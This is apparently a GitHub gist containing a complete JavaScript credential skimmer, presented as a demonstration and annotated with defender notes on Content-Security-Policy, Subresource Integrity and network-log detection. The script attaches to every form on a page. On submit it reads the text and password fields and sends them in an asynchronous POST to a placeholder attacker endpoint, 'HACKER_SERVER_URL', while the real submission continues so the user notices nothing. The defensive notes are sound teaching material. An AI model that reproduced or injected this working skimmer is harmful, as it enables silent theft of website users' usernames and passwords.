@yaronv
Created July 15, 2016 06:29
/**
 * Demonstration of a form-grabbing (credential-skimming) script.
 *
 * Once this IIFE executes inside a page it attaches a submit listener to every
 * <form> returned by getElementsByTagName at that moment. On submit it reads the
 * form's text/password inputs and POSTs them to a separate endpoint via XHR.
 * The handler never calls preventDefault and the XHR is asynchronous, so the
 * page's own submission goes ahead as usual.
 *
 * Defender notes:
 *  - The only network side effect is the XHR to the URL in `url`; a
 *    Content-Security-Policy `connect-src` allow-list is the control that
 *    governs where script-initiated XHR may connect.
 *  - The script has to get into the page first; `script-src` restrictions and
 *    Subresource Integrity on third-party scripts limit that.
 *  - In the browser network panel or proxy logs this shows up as a
 *    form-urlencoded POST carrying `username=`/`password=` to an origin other
 *    than the form's action, fired at submit time.
 */
(function() {
// get all the form elements on the page
var forms = document.getElementsByTagName('form');
// iterate all the form elements and add a new submit event listener
// (onFormSubmit is a function declaration further down; hoisting makes it usable here)
for (var i=0; i < forms.length; i++) {
var form = forms[i];
if (form.addEventListener) {
// third argument `true` registers the listener for the capture phase
form.addEventListener('submit', onFormSubmit, true);
} else if (form.attachEvent) {
// legacy Internet Explorer event API
form.attachEvent('onsubmit', onFormSubmit);
}
}
/**
 * Reads credential-looking inputs from a form and sends them to the remote endpoint.
 * Nothing is sent unless both a text value and a password value are non-empty.
 *
 * @param {HTMLFormElement} form - the form whose <input> descendants are inspected
 */
function collectInputValues(form) {
// getting all the input elements
var inputs = form.getElementsByTagName('input');
var username = '';
var password = '';
for (var i = 0; i < inputs.length; i++) {
var input = inputs[i];
// reads the literal `type` attribute, not the reflected `input.type` property
var type = input.getAttribute('type');
// store the username (each later type="text" input overwrites the earlier value)
if (type == 'text') {
username = input.value;
}
// store the password
if (type == 'password') {
password = input.value;
}
}
if (username != '' && password != '') {
var http = new XMLHttpRequest();
// placeholder for the collection endpoint; no real address appears in this listing
var url = "HACKER_SERVER_URL";
// setting the form values inside the parameters string before sending the request
var params = "username=" + username + "&password=" + password;
// asynchronous POST (third argument `true`) carrying the form values
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// Content-length and Connection are forbidden request header names in the XHR
// spec; browsers set them themselves and refuse script attempts to set them
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
// request completed with HTTP 200; the demo does nothing with the response
}
}
http.send(params);
}
}
/**
 * Submit handler attached to every hooked form.
 * Resolves the element the event was dispatched on and passes it to collectInputValues.
 *
 * @param {Event} event - submit event; when absent, window.event is used instead
 */
function onFormSubmit(event) {
// legacy Internet Explorer exposes the current event as window.event
if (!event) var event = window.event;
var target;
// getting the relevant form (event.target, or srcElement on legacy IE)
if (event.target) target = event.target;
else if (event.srcElement) target = event.srcElement;
if (!target) return;
// call the method to collect the form values
collectInputValues(target);
}
})();